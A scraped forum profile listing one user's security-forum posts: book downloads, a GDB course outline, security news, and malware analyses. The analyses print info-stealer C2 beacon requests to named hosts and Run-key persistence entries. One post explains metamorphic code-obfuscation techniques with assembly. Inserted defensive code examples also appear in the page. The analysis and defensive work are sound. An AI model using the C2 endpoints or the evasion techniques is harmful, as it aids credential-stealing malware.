Usr6

Everything posted by Usr6

  1. The book’s unique collection of puzzles is supplemented with carefully developed tutorials on algorithm design strategies and analysis techniques intended to walk the reader step-by-step through the various approaches to algorithmic problem solving. Mastery of these strategies–exhaustive search, backtracking, and divide-and-conquer, among others–will aid the reader in solving not only the puzzles contained in this book, but also others encountered in interviews, puzzle collections, and throughout everyday life. Each of the 150 puzzles contains hints and solutions, along with commentary on the puzzle’s origins and solution methods. The only book of its kind, Algorithmic Puzzles houses puzzles for all skill levels. Readers with only middle school mathematics will develop their algorithmic problem-solving skills through puzzles at the elementary level, while seasoned puzzle solvers will enjoy the challenge of thinking through more difficult puzzles. Download: DepositFiles Source
  2. Description: The GNU Debugger or GDB as it is popularly called is one of the most important tools in a binary analysis researcher's arsenal. Unfortunately, even though the official documentation is HUGE, it's quite difficult for beginners and even intermediate users to pick things up! The SecurityTube GNU Debugger Expert course and certification aims to help you get up and running with GDB. In the course of these videos we will look at applying GDB on multiple architectures - 32, 64 and ARM. We will look at how to do runtime analysis, program disassembly, reverse engineering and a ton of other fun things!

     Part 1: Course Introduction And Lab Setup
     Part 2: What's Up With The Symbol Files?
     Part 3: Analyzing Symbols With Nm
     Part 4: System Call Tracing With Strace
     Part 5: Breakpoints, Examining Registers And Memory
     Part 6: Modifying Registers And Memory
     Part 7: Gdb Convenience Variables And Calling Routines
     Part 8: Cracking A Simple Binary With Debug Symbols
     Part 9: Disassembling And Cracking A Simple Binary
     Part 10: Conditional Breakpoints Using Variables And Registers
     Part 11: Setting Up Debian Armel In Qemu
     Part 12: Cracking A Simple Program On Arm Architectures
     Part 13: Iphone Application Reversing And Cracking With Gdb
     Part 14: Gdb On 64 Bit Systems

     Collected from securitytube.net, by Vivek-Ramachandran
  3. starting with what memory forensics actually is, and the differences between memory and live forensics. He then went on to discuss Volatility, a framework for the extraction of digital artifacts from volatile memory (RAM) samples. Detailed information about Volatility covered the following areas:

     • Overview
     • Per-Process Analysis
     • API hooking
     • Misc. Process Data
     • GUI Subsystem
     • Registry in Memory
     • Callbacks
     • IRP Hooking
     • Devices
     • MBR & MFT

     http://fast.wistia.com/embed/iframe/927ezhtxwv Slides Source
  4. promo link: https://www.surdoc.com/sign-up/?promo=2013CES promo code: 2013CES Also, you'll get an option to renew for 3 more years at $20 a year! Source: https://www.facebook.com/MySurDoc
  5. RDG Packer Detector is a detector of packers, cryptors, compilers, packer scramblers, joiners and installers.

     + Windows 7 compatible
     + Windows 8 compatible
     + 32/64-bit PE detection
     - Has a fast detection system.
     - Has a powerful detection system that analyzes the entire file, allowing multi-detection of packers in several cases.
     - Lets you create your own detection signatures.
     - Has a cryptographic analyzer.
     - Can calculate the checksum of a file.
     - Can calculate the entropy, reporting whether the analyzed program is compressed, encrypted or not.
     - Detector of the OEP (Original Entry Point) of a program.
     - You can check for and download signatures, so your RDG Packer Detector is always up to date.
     - Plug-in loader.
     - Signature converter.
     - Detector of entry point fakers.
     - De-Binder, an extractor of attached files.
     - Improved heuristic system.

     Download: http://www.egrupos.net/grupo/rdgsoft/ficheros/16/verFichero/11/RDG%20Packer%20Detector%20v0.7.0%202013%20Vx-Edition.rar
     Signatures - 1 Jan 2013: http://www.egrupos.net/grupo/rdgsoft/ficheros/16/verFichero/12/RDG%20Signaturas%20Actualizables%201Enero2013.rar
     Source: http://www.rdgsoft.8k.com/

     *the description is in Spanish, but I think it is understandable and needs no translation; anyway, in short: it detects the packer/ crypter/ compiler/ binder/ installer/ etc. used for executable (PE) files
  6. Usr6

    3 suggestions

    1. @b3st & bc-vnt & others, what is stopping you right now from voluntarily analyzing the files and posting the result? If a file looks suspicious to you, you analyze it, post the result and that's it - you don't need special approval to do this. 2&3. osc, tf, you want Mod :)) What good does it do you to just close a topic if you don't also delete the infected link? So you also need the right to edit the post in question. If you have caught a user posting an infected file, can you leave him like that without a ban? So you also need the right to ban.
  7. wait 2s, let me take a picture //
     File: wallhack.exe
     SHA-1: 5af2e195a4a5c87235dbb4ac960aa7144bffd220
     info stealer. control panel address: http://torrentsmd.herobo.com/index.php
     "Create By : The Hacker2012 .. am lucrat ceva la el .. 90 % e fakt de mn !" nice work
  8. Watched it. A tutorial worth following even by people who are not particularly interested in exploiting, for general culture. Short and to the point. Good job. Congratulations! If you allow me a small addition (I know you know this, since I "stole" a lot of knowledge in the field from you): you did the jump to esp using shell32.dll; as you said yourself, that address differs from Windows to Windows depending on language/service pack/etc. In "real life", where possible, it is preferred to pick the jump from the libraries that ship with the software, to avoid the incompatibilities mentioned above // come on, you dead weight, move
  9. Any Romanian can now find out whether they have the qualities needed to become a spy and how to get hired by the Romanian Intelligence Service (SRI). An online test has been published on the official SRI web page; it comprises 15 steps, and at the end you receive an answer about the qualities you have. Those who match the profile are also shown the ways in which they can be hired by the SRI. Source: jurnalul.ro Test: Romanian Intelligence Service - Check your aptitudes
  10. Cyber-security experts turned the tables on an alleged hacker by using his own malware to film him through his own laptop webcam. Specialists from Georgia's Computer Emergency Response Team (CERT-Georgia) tricked a man they claim has been targeting their networks by hiding the virus inside a file titled 'Georgian-Nato Agreement'. After the attacker stole that archive from an infected PC in their lab, they were able to seize control of his computer and capture video of him at work. 'Hacker': This is the picture of the alleged cyber-attacker captured by Georgian security experts after they took control of malware on their systems and infected his computer with it The team also claim to have found out his home city, internet service provider and email addresses, as well as information that links him to Russian security agencies and other hackers in Germany. CERT-Georgia's experts had been investigating a botnet which had infiltrated the computers of politicians, civil servants, banks and NGOs in Georgia, the U.S., Canada, Ukraine and several other countries. They found that the attackers had planted malicious links to install the malware on specific news-site webpages that would be of interest to the kinds of people they wanted to target. '[The] threat was highly encrypted and used contemporary stealthy techniques, so that none of security tools could identify it,' the team said in a 27-page report into their investigation. Once installed, the virus seized control of the targeted computer, rifling its hard drives to search for Word and .pdf documents containing sensitive words like 'USA', 'NATO', 'Russia' and 'CIA'. The malware also scanned the computer's local network for find other hosts to infect, took screenshots, and took control of embedded webcams and microphones on machines to eavesdrop on targets. 
The investigation found the infiltration began as early as March 2011, with the virus undergoing a series of modifications as hackers tried to stay one step ahead of whatever security measures were used against it. CERT-Georgia's experts found that whenever they were able to trace the botnet's command and control servers, to which files were being uploaded, the hackers would switch the destination country and IP address. To fight the infections, the team blocked these IP addresses as soon as they were detected then cooperated with anti-virus software companies and foreign intelligence agencies to develop countermeasures. But their masterstroke was to work out how to take control of the botnet themselves and infect one of the hackers with his own malware. They then recorded him as he worked. Espionage: This screengrab provided by CERT-Georgia shows the various keywords that the virus searched for in files on targeted machines Their report explained, in broken English: 'We have Infected our PC from Lab, then gave Cyber Attacker Fake ZIP Archive with his own virus inside and the name “Georgian-Nato Agreement”. 'Attacker Stole that archive and executed malicious files. 'As we had access to BOT Panel, we had maintained control over his PC. 'Then captured got video of him, personally. We have captured process of creating new malicious modules. 'We have obtained Russian Document, from e-mail, where he was giving someone instructions how to use this malicious software and how to infect targets. 'We have linked him with some of German and Russian hackers. 'Then we have obtained information about his destination city, Internet service provider, e-mail, and etc.' Russia has long been suspected as behind a string of cyber attacks on Georgian targets. There were crippling denial-of-service attacks on Georgian banks and government networks before the Russian military attacked in 2008, arstechnica reported. 
Now, with security experts able to turn the tables on hackers, it appears a new chapter in cyber-warfare has begun. WHAT IS A BOTNET? A botnet is a collection of internet-connected computers over which a hacker has seized control. Each compromised machine - known as a 'bot' - is created when a computer is infected with malicious software (malware) which allows the hacker to direct its activities remotely. These infections can be accomplished by luring users into making a drive-by download, exploiting web browser vulnerabilities, or by tricking the user into running a Trojan horse program, which may come via email. This malware will typically install modules that allow the computer to be commanded and controlled by the botnet's operator. Depending on how it is written, a Trojan may then delete itself, or may remain present to update and maintain the modules. Source: http://www.dailymail.co.uk/sciencetech/article-2225743/Alleged-hacker-caught-camera-cyber-security-experts-infect-HIS-OWN-virus.html?ito=feeds-newsxml
  11. we bring you a 24 hour spooktacular giveaway of CyberGhost VPN (69.99 USD value) to give you that invisible power and get you protected from cyber-thieves. CyberGhost Classic VPN 12 months prepaid Anonymize yourself with your own Virtual Private Network. Simple and secure. Sofort-Download 1 53,98 53,98 link: 24 hour exclusive CyberGhost VPN Spooktacular giveaway! | Software Deals - CNET Download.com ps: do not take more than 1 license, 2 promotional licenses cannot be used; the offer is valid today, 1 November 2012 // * Unlimited traffic volume included. Speed limited to a maximum of 512 kbit/s after 20 GB/month
  12. Four years after discovering that militants were tapping into drone video feeds, the U.S. military still hasn’t secured the transmissions of more than half of its fleet of Predator and Reaper drones, Danger Room has learned. The majority of the aircraft still broadcast their classified video streams “in the clear” — without encryption. With a minimal amount of equipment and know-how, militants can see what America’s drones see. Unmanned aerial vehicles, or UAVs, have become the single most important weapon in America’s far-flung pursuit of violent extremists. Hundreds of American Predators and Reapers fly above Libya, Yemen, Somalia, Pakistan, and Afghanistan — watching suspected enemies, and striking them when necessary. Nearly 3,000 people have been killed in the decade-long drone campaign. “If somebody could obtain reliable access to real-time Predator or Reaper video — without attribution or alerting U.S. military — that would a tremendous intel coup,” says Micah Zenko, a fellow at the Council on Foreign Relations. “There is an insatiable demand from Predator and Reaper imagery in Afghanistan and elsewhere. Any reluctance to use those for spying or missile strikes places operations in Afghanistan, Pakistan, Yemen, and Somalia at some risk.” Military officials have known about — and mostly shrugged off — the vulnerability since the development of the Predator in the 1990s. But the problem drew increased attention in 2008, when drone video footage was found on the laptops of Shi’ite militants in Iraq, who were able to intercept the feed using a piece of $26 software. The Pentagon and the defense industry assured the public that they’d close the hole by retrofitting the robotic aircraft with new communications protocols and encrypted transceivers that would keep the video from being intercepted again. 
Four years into the effort, however, only “30 to 50 percent” of America’s Predators and Reapers are using fully encrypted transmissions, a source familiar with the retrofitting effort tells Danger Room. The total fleet won’t see its communications secured until 2014. This source and others who work closely with drone operations say that drones flying overseas are among the first to get the newly secured equipment. They also noted that they are unaware of any incidents of militants using America’s unmanned eyes in the sky to their advantage. “But I’m surprised I haven’t,” the source adds. “And that doesn’t mean it’s not happening.” This isn’t the only vulnerability in the drone fleet. In March of 2011, an unknown software glitch caused a Predator stationed at a U.S. base in Africa to start its engine without human direction. Last October, as Danger Room first reported, Air Force technicians discovered a virus infecting the drones’ remote cockpits in Las Vegas. It took weeks of sustained effort to clean up the machines. The aircraft, which rely on GPS to guide them through the air, can run into problems if GPS signals are jammed in a particular area — something that can be done with cheap, commercially available hardware. Iranian officials claimed they hacked the GPS control signal of an advanced drone, though it’s impossible to verify that lofty claim. No one who works with UAVs is questioning the fundamental integrity of the drone fleet at the moment; it would take an incredibly sophisticated hacker to commandeer a Predator, for example. Nor is anyone pretending that this premiere tool of the U.S.global counterterror campaign is flawless. Predators and the larger, better-armed Reapers transmit video and accept instructions in one of two ways. The first is via satellite, to remote pilots and sensor operators who are often on the other side of the planet; these satellite communications are encrypted, and are generally considered secure. 
The second is through a radio frequency signal called the Common Data Link, which is used to share the drone’s video feed with troops on the ground. The CDL’s carrier signal — its specific pattern of frequencies, in a given order and for a given length of time — tells both transmitter and receiver on how to function. The problem is that the Predators’ version of the CDL carrier signal (also known as a “waveform”) didn’t include an order to encrypt the signal. So neither the transmitter on the drone nor the receivers that troops used on the ground employed encryption, either. There were reasons for this. The original Predator, just 27 feet long, was little more than a scaled-up model plane with an 85-horsepower engine. It had a payload of just half a ton for all its fuel, cameras and radios. And encryption systems can be heavy. (Big crypto boxes are a major reason the Army’s futuristic universal radio ended up being too bulky for combat, for example.) With the early Predator models, the Air Force made the conscious decision to leave off the crypto. The flying branch was well aware of the risk. “Depending on the theater of operation and hostile electronic combat systems present, the threat to the UAVs could range from negligible with only a potential of signal intercept for detection purpose, to an active jamming effort made against an operating, unencrypted UAV,” the Air Force reported in 1996. ”The link characteristics of the baseline Predator system could be vulnerable to corruption of down links data or hostile data insertions.” The Predator models steadily grew in power and payload, and took a big leap in dimensions and capability with the 36-foot-long Reaper version introduced in 2007. The Reaper has a 950-horsepower engine and a nearly 4,000-pound payload — more than enough capacity for crypto-enabled systems which, like all electronics, had shrunk in size and weight. 
The problem was that, by then, the military had rushed to the battlefield hundreds of Remotely Operated Video Enhanced Receivers, or Rovers – rugged, laptop-sized receivers with screens for watching drone footage. And those early versions of the Rovers were developed and distributed so fast, the military once again left the crypto off. “It could be both intercepted (e.g., hacked into) and jammed,” e-mails an Air Force officer with knowledge of the program. Which means the Pentagon was stuck, for a time. The military couldn’t replace the old CDL waveform with something encryptable until the Rovers — and the radio transmitters aboard the Predators — could handle such a signal. Eventually, the Rovers began to be swapped out for newer models. The latest version, the “Tactical Rover,” (.pdf) is about the size of an old-school mobile phone. It can use both the Advanced Encryption Standard and the triple-Data Encryption Standard to secure video feeds. There are now about a thousand of the units in the military’s hands. And now, the Predators and Reapers are starting to get enhanced radios, too. “The fleet-wide upgrade begins later this year and carries on for several years,” says Maj. Mary Danner-Jones, an Air Force spokesperson. The service is spending $12 million on crypto-enabled Vortex transceivers (.pdf). That’s allowing a new, hardened waveform to be introduced throughout the Predator and Reaper fleet. The Air Force recently gave Predator-maker General Atomics Aeronautical Systems a $26 million contract to retrofit its drone cockpits to accept the carrier signal, among other enhancements. The question is why hasn’t this happened sooner. After all, the Navy installed multiple layers of encryption in their ’bots some time ago. 
Navy spokesman Jamie Cosgrove tells Danger Room that “the vast majority” of naval drones are encrypted – “and have been since development.” One source who works on developing Navy UAVs, but is not authorized to speak on the record, explains why: “Standard unencrypted video is basically a broadcast to whoever can figure out the right carrier frequency, so essentially, we are simulcasting to battlefield commanders and the opposing force. If that opposing force knows we can see them and from where, they can take better evasive maneuvers.” It’s possible that none of the militants America is trying today are as sophisticated as the ones who intercepted that drone video in 2008. It’s possible that the value of such footage-from-above is so fleeting that extremists have never again bothered to grab it. But it’s worth noting that Predator and Reaper video is considered by the U.S. military to be classified information. And when U.S. commanders on the ground get into a firefight, the first call they usually make is for a drone, so they can take a look at the battlefield through the eyes of a drone. Source: http://www.wired.com/dangerroom/2012/10/hack-proof-drone/
  13. all lumped together

      File: Istealer 6.3.exe
      SHA-1: 9c80725239cdeab95e1654ea24326b679d049d14
      Size: 1.72 MB (1,806,336 bytes)

      GET /A/O/?action=add... HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
      Host: caddyfkn.net63.net
      Connection: Keep-Alive

      HKCU\Software\Microsoft\Windows\CurrentVersion\Run
        Microsoft Essentials    c:\documents and settings\administrator\local settings\temp\javaw.exe
        MS Sound Drivers        c:\documents and settings\administrator\local settings\temp\istealer 6.3.exe

      File: expressvpn-install_v3.091.exe
      SHA-1: 17d6d274ce596ee46c73ce7b95b6082ba28778d4
      Size: 2.20 MB (2,310,144 bytes)

      GET /A/O/?action=add&a=...
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
      Host: caddyfkn.net63.net
      Connection: Keep-Alive

      HKCU\Software\Microsoft\Windows\CurrentVersion\Run
        Microsoft Essentials    c:\documents and settings\administrator\local settings\temp\javaw.exe

      File: hc stealer @Lurrdock.exe
      SHA-1: e9dad76752d373c80b07f8a43ac81675b3d73a5d
      Size: 1.72 MB (1,806,336 bytes)

      GET /A/O/?action=add... HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
      Host: caddyfkn.net63.net
      Connection: Keep-Alive

      HKCU\Software\Microsoft\Windows\CurrentVersion\Run
        Microsoft Essentials    c:\documents and settings\administrator\local settings\temp\javaw.exe

      File: Cryptex - Cracked by TopLeakers.exe
      SHA-1: 9737fc9d66c14a4d6ae0d34c7642eb0a68ea1b39
      Size: 1.72 MB (1,806,336 bytes)

      GET /A/O/?action=... HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
      Host: caddyfkn.net63.net
      Connection: Keep-Alive

      HKCU\Software\Microsoft\Windows\CurrentVersion\Run
        Microsoft Essentials    c:\documents and settings\administrator\local settings\temp\javaw.exe
        MS Sound Drivers        c:\documents and settings\administrator\local settings\temp\cryptex - cracked by topleakers.exe

      the other files, also taken from his posts: https://rstcenter.com/forum/60985-express-vpn-witch-cd-key.rst https://rstcenter.com/forum/60983-hc-stealer-crypterx.rst
  14. Hacker's Delight (2nd Edition) By Henry S. Warren 2012 | 512 Pages | ISBN: 0321842685 | EPUB | 45 MB

      In Hacker’s Delight, Second Edition, Hank Warren once again compiles an irresistible collection of programming hacks: timesaving techniques, algorithms, and tricks that help programmers build more elegant and efficient software, while also gaining deeper insights into their craft. Warren’s hacks are eminently practical, but they’re also intrinsically interesting, and sometimes unexpected, much like the solution to a great puzzle. They are, in a word, a delight to any programmer who is excited by the opportunity to improve.

      Extensive additions in this edition include

      • A new chapter on cyclic redundancy checking (CRC), including routines for the commonly used CRC-32 code
      • A new chapter on error correcting codes (ECC), including routines for the Hamming code
      • More coverage of integer division by constants, including methods using only shifts and adds
      • Computing remainders without computing a quotient
      • More coverage of population count and counting leading zeros
      • Array population count
      • New algorithms for compress and expand
      • An LRU algorithm
      • Floating-point to/from integer conversions
      • Approximate floating-point reciprocal square root routine
      • A gallery of graphs of discrete functions
      • Now with exercises and answers

      filepost Source: http://ebookee.org/Hacker-s-Delight-2nd-Edition-_2030561.html
  15. why should I light the ropes? it is simpler to make a sundial with a matchstick in the middle and wait for the 45 min to pass; between 2 match heads there are 15 min, between 2 ropes (black stripes) 1 hour
  16. There are 3 major metamorphic techniques that are used in most metamorphic/polymorphic engines: Dead Code Injection, Register Usage Exchange (Register Renaming), and Equivalent Code Substitution. I will explain each of these techniques and give a simple example.

      Dead Code Injection: This technique places do-nothing instructions before, after, or in between regular code instructions. It is also known as "Junk Code" or "Garbage Code". Most will use the XOR, JMP, or NOP instruction for dead code injection. This example will place dead code before the call to a WinExec function:

          xor ecx,ecx     ;Zero out the contents of the ecx register
          mov eax,ecx     ;Move ecx into eax. Eax is now zero
          push eax        ;Regular instruction
          push 01008748   ;Regular instruction
          call WinExec    ;Regular instruction

      As you can see, we used two dead instructions to get "push eax" instead of just using one "push eax" instruction. That extra code rearranges the opcodes within the file.

      Register Usage Exchange (Register Renaming): This technique swaps registers and variables around within the file while still keeping the code functioning the same. The first set of instructions is the original code and the second is the renamed code:

          pop edx                       ;Regular instruction
          mov edi,004h                  ;Regular instruction
          mov esi,ebp                   ;Regular instruction
          mov eax,000ch                 ;Regular instruction
          add edx,0088h                 ;Regular instruction
          mov ebx,[edx]                 ;Regular instruction
          mov [esi+eax*4+00001118],ebx  ;Regular instruction

          pop eax                       ;Renamed instruction
          mov ebx,004h                  ;Renamed instruction
          mov edx,ebp                   ;Renamed instruction
          mov edi,000ch                 ;Renamed instruction
          add eax,0088h                 ;Renamed instruction
          mov esi,[eax]                 ;Renamed instruction
          mov [edx+edi*4+00001118],esi  ;Renamed instruction

      Here we just swapped the registers for others while keeping the code running as normal.

      Equivalent Code Substitution: This technique allows you to replace an instruction with an equivalent instruction or an equivalent block of instructions. No real need to explain most of these since they are self-explanatory. But here are a few examples nonetheless:

          mov eax,0           ;Is equivalent to xor eax,eax
          push eax            ;Is equivalent to mov edx,eax
          pop edx
          lea eax, [eax+edx]  ;Is equivalent to add eax,edx

      Source
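As an added example (not part of the original post or its source), the sketch below shows why detection tooling normalizes code before matching: once the equivalent forms listed above are rewritten to one canonical form and registers are replaced by placeholders in order of first use, the "regular" and "renamed" listings from the post produce the same text. The function names and the choice of canonical forms are assumptions of this example; flag side effects are ignored and no dead-code removal beyond `nop` is attempted.

```python
import re

# General-purpose registers an engine can rename freely; esp/ebp keep fixed roles.
RENAMEABLE = ("eax", "ebx", "ecx", "edx", "esi", "edi")
REG_RE = re.compile(r"\b(" + "|".join(RENAMEABLE) + r")\b")
ZERO_RE = re.compile(r"^(0x)?0+h?$")          # 0, 00h, 0x0 ...
LEA_SUM_RE = re.compile(r"^\[(\w+)\+(\w+)\]$")  # [reg+reg]

# Listings transcribed from the post above.
ORIGINAL = """
pop edx
mov edi,004h
mov esi,ebp
mov eax,000ch
add edx,0088h
mov ebx,[edx]
mov [esi+eax*4+00001118],ebx
"""
RENAMED = """
pop eax
mov ebx,004h
mov edx,ebp
mov edi,000ch
add eax,0088h
mov esi,[eax]
mov [edx+edi*4+00001118],esi
"""


def parse(listing):
    """Turn a listing into [(mnemonic, [operands])], dropping ';' comments."""
    instrs = []
    for line in listing.splitlines():
        code = line.split(";", 1)[0].strip().lower()
        if not code:
            continue
        parts = code.split(None, 1)
        rest = re.sub(r"\s+", "", parts[1]) if len(parts) > 1 else ""
        instrs.append((parts[0], [op for op in rest.split(",") if op]))
    return instrs


def canonicalize(instrs):
    """Rewrite the post's equivalent forms to one canonical spelling each."""
    out = []
    for mnemonic, ops in instrs:
        if mnemonic == "nop":
            continue  # simplest do-nothing instruction
        if (mnemonic == "mov" and len(ops) == 2
                and ops[0] in RENAMEABLE and ZERO_RE.match(ops[1])):
            mnemonic, ops = "xor", [ops[0], ops[0]]        # mov r,0 -> xor r,r
        elif mnemonic == "lea" and len(ops) == 2:
            m = LEA_SUM_RE.match(ops[1])
            if m and m.group(1) == ops[0] and m.group(2) in RENAMEABLE:
                mnemonic, ops = "add", [ops[0], m.group(2)]  # lea r,[r+s] -> add r,s
        elif (mnemonic == "pop" and len(ops) == 1 and out
                and out[-1][0] == "push" and len(out[-1][1]) == 1):
            pushed = out.pop()[1][0]
            mnemonic, ops = "mov", [ops[0], pushed]        # push a; pop b -> mov b,a
        out.append((mnemonic, ops))
    return out


def abstract_registers(instrs):
    """Replace each renameable register with R0, R1, ... in first-use order."""
    names = {}

    def rename(match):
        return names.setdefault(match.group(1), "R%d" % len(names))

    return [(m, [REG_RE.sub(rename, op) for op in ops]) for m, ops in instrs]


def normalize(listing):
    """Canonical text form used for comparison or hashing by a signature."""
    instrs = abstract_registers(canonicalize(parse(listing)))
    return "\n".join((m + " " + ",".join(ops)).strip() for m, ops in instrs)


if __name__ == "__main__":
    print(normalize(ORIGINAL))
    print("variants match:", normalize(ORIGINAL) == normalize(RENAMED))
```

A byte or text signature taken over `normalize()` output matches both variants, whereas one taken over the raw listings matches only the variant it was written for.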
  17. Usr6

    HomeBank

    «HomeBank» is free software. It's an easy personal finance software that will help you manage your personal accounting. It is designed to be easy to use and to be able to analyse your personal finances in detail using powerful filtering tools and graphs. «HomeBank» benefits from more than 17 years of user experience and feedback. It is available for ~50 languages on GNU/Linux, FreeBSD, Microsoft Windows, MacOSX, and Nokia N***. If you are looking for an easy way to manage your personal finance then «HomeBank» should be the software of choice. Take some time to try it out, you won't regret it. Windows, macOSX, maemo, ubuntu, debian, open suse, fedora, mandriva, gentoo linux, arch linux, mops linux, +source code Download: HomeBank download Home: HomeBank - Free, easy, personal accounting for everyone Source: http://homebank.free.fr/index.php
  18. Chengyu Cao, of the University of Connecticut, hopes that in the near future intelligent robots will work side by side with humans to solve a wide range of problems, from those related to science to those related to monitoring natural habitats. Currently, the professor of mechanical engineering is working on creating a new generation of intelligent machines, autonomous devices capable of navigating our world on their own. Such machines will not only be able to travel from one place to another without help, but will be able to "think", using artificial intelligence to overcome certain obstacles or situations in the environment (a tree, a building, an unexpected change in the weather). "Many of the autonomous vehicles used today are piloted by remote control and require support personnel and special equipment. Our research intends to develop autonomous systems that are reliable, safe and able to adapt to a wide range of situations and environments," the researcher explained. The research team is also developing sensor networks that allow the machines to navigate without human help. They also want to create a complex control system that allows groups of robots to cooperate. One example would be a group of four autonomous helicopters that lift and carry a large object without dropping it and without going off course. The research team led by Cao has built a sophisticated, remote-controlled helicopter, which is to be modified so that it can be used to test the new design of the control system. The specialists have also developed a prototype of a submersible, named Proteus, to test the system in the aquatic environment. Recently, the team led by Cao received a grant worth 1.2 million dollars to develop an underwater robotic network that can be used in search and rescue missions. 
"These vehicles use global positioning systems, video cameras, light sensors and laser altimetry to navigate. In this way, the system allows the vehicles to choose their own route. I do not think it will be long before people trust vehicles that operate without human help," said pilot Igor Parsadanov. Source: http://www.descopera.ro/dnews/10181470-nu-este-film-sf-e-realitate-apar-dronele-inteligente-care-functioneaza-fara-ajutorul-oamenilor-video
  19. One of the most difficult to remove e-threats in the world, the TDL4 rootkit, appears to be back with a blast. According to a news report from network monitoring specialist Damballa, the new variant has not been isolated yet in binary form, but rather had its presence revealed by the “network noise” between the compromised systems and their command & control centers.

      Named by some antivirus vendors the “indestructible botnet”, the TDL4 infrastructure employs a series of tricks such as the use of rootkits to conceal their presence on the machine and evade detection, as well as encrypted traffic and peer-to-peer communication with the botmaster.

      The new variant is apparently able to infect the Volume Boot Record (VBR) – a special area of the hard-disk drive that is relatively off-limits for consumer-grade antivirus solutions. This trick allows the rootkit to stay completely hidden and – even if found – to make disinfection nearly impossible.

      The response to this strain of malware appears to come from the enterprise environment, as business-grade devices come equipped with a special module, called the Trusted Platform Module (TPM). This piece of hardware stores the signatures of critical start-up components of the computer it is installed on and can detect changes at the lower levels of the system.

      “Following the success of TDL4, hackers have been able to use the rootkit to develop new variants that continue to go undetected by antivirus. The latest iteration, dubbed SST.c, infects the Volume Boot Record,” said Joseph Souren, Vice President of trusted computing company Wave Systems in a quote for Net Security.

      Even if TPM can collect data from the computer and correlate it with what happens across the network, TDL4 has traditionally been a complex threat aimed at regular computer users, not at enterprises. This multi-purpose family of malware has been used like an accomplice to shady business such as adware delivery, click fraud and massive botnet operations.

      It may look like the end-user will be exposed to this type of threat until the antivirus aligns its technology to scan and disinfect the VBR area as well. This is not exactly true: for years, attacks against BIOS chips have been possible, although they would be somewhat complex to successfully achieve. And yet, no such incidents have been recorded outside the laboratory premises, even if no antivirus scans the BIOS area for malicious code, nor would it be able to pluck it out of the BIOS chip if found. This is mostly due to the fact that the malicious code is vulnerable until it gets executed on the host machine and can be easily intercepted by any decent antivirus solution with behavioral detection.

      source: http://www.hotforsecurity.com/blog/new-variant-of-tdl4-buries-itself-deep-into-the-hard-drive-to-evade-detection-3848.html
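The TPM check described in the post above, as an added example that is not part of the quoted article: a software model of the TPM extend operation (new PCR = SHA-256(old PCR || digest of the component)), showing why a changed Volume Boot Record alters the final register value and how replaying the boot event log against a known-good baseline names the changed stage. The stage names, byte strings and baseline are constructed sample data; a real TPM performs the extend in hardware.

```python
import hashlib

PCR_SIZE = 32  # SHA-256 bank; a PCR is all zeros after platform reset

def measure(component: bytes) -> bytes:
    """Digest of one boot component, as recorded in the event log."""
    return hashlib.sha256(component).digest()

def extend(pcr: bytes, digest: bytes) -> bytes:
    """TPM extend: new PCR = SHA-256(old PCR || digest). Order matters."""
    return hashlib.sha256(pcr + digest).digest()

def boot(stages):
    """Measure each (name, bytes) stage in order; return (final_pcr, event_log)."""
    pcr = bytes(PCR_SIZE)
    log = []
    for name, blob in stages:
        digest = measure(blob)
        pcr = extend(pcr, digest)
        log.append((name, digest))
    return pcr, log

def replay(log):
    """Recompute the PCR from an event log, as a verifier does."""
    pcr = bytes(PCR_SIZE)
    for _name, digest in log:
        pcr = extend(pcr, digest)
    return pcr

def verify(reported_pcr, log, baseline):
    """Return (log matches PCR, stages whose digest differs from baseline)."""
    consistent = replay(log) == reported_pcr
    changed = [name for name, digest in log if baseline.get(name) != digest]
    return consistent, changed

# Constructed sample boot chain (placeholder byte strings, not real boot code).
CLEAN = [("MBR", b"mbr-v1"), ("VBR", b"vbr-v1"), ("bootmgr", b"bootmgr-v1")]
TAMPERED = [("MBR", b"mbr-v1"), ("VBR", b"vbr-v1+patch"), ("bootmgr", b"bootmgr-v1")]
GOOD_PCR, GOOD_LOG = boot(CLEAN)
BASELINE = dict(GOOD_LOG)

if __name__ == "__main__":
    bad_pcr, bad_log = boot(TAMPERED)
    print("clean   :", GOOD_PCR.hex())
    print("tampered:", bad_pcr.hex())
    print("verify  :", verify(bad_pcr, bad_log, BASELINE))
    # A log edited to show clean digests no longer replays to the reported PCR.
    print("forged  :", verify(bad_pcr, GOOD_LOG, BASELINE))
```

Because each extend hashes the previous register value, software that runs after a stage has been measured cannot roll the register back to the clean value.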
  20. 07_Reversing Android Malware.pdf
      1314775653_emilien.girault-at-sogeti.com_Forensic Challenge 2011 - Challenge 9 - v2.doc
      1_La_diffusione_di_Android_al_di_fuori_del_marcato_mobile.pdf
      A Look Inside the Android Kernel.pdf
      A Methodology for Empirical Analysis of Permission-Based Security Models and its Application to Android.pdf
      A RECORD-BREAKING YEAR FOR MALWARE.pdf
      A Study of Android Application Security.pdf
      A Survey of Mobile Malware in the Wild.pdf
      AISEC-TR-2012-001-Android-OS-Security.pdf
      An Android Security Case Study with Bauhaus.pdf
      Andbot Towards Advanced Mobile Botnets .pdf
      Android Analysis Framework Dexter.pdf
      Android Binder.pdf
      Android Malware Forensics Reconstruction of Malicious Events.pdf
      Android Reverse Engineering Tools.pdf
      Android security model.pdf
      Android Security.pdf
      Android-Market-Threat-Analysis-6-22-10-v1.pdf
      androidcours.pdf
      Android_Security_Model.pdf
      android_trojan_zitmo_final_pdf_17585.pdf
      androsim-1.2.exe
      AnserverBot_Analysis.pdf
      Anti-Malware solutions for Android.pdf
      Application Collusion Attack on the Permission-Based Security Model and its Implications for Modern smartphone Systems.pdf
      Arthur_Donkers_en_Ralph_Moonen.pdf
      Behavior abstraction in Malware analysis.pdf
      BH_US_11_Daswani_Mobile_Malware_WP.pdf
      BlackHat_DC_2011_Avraham-Popping_Android_Devices-Slides.pdf
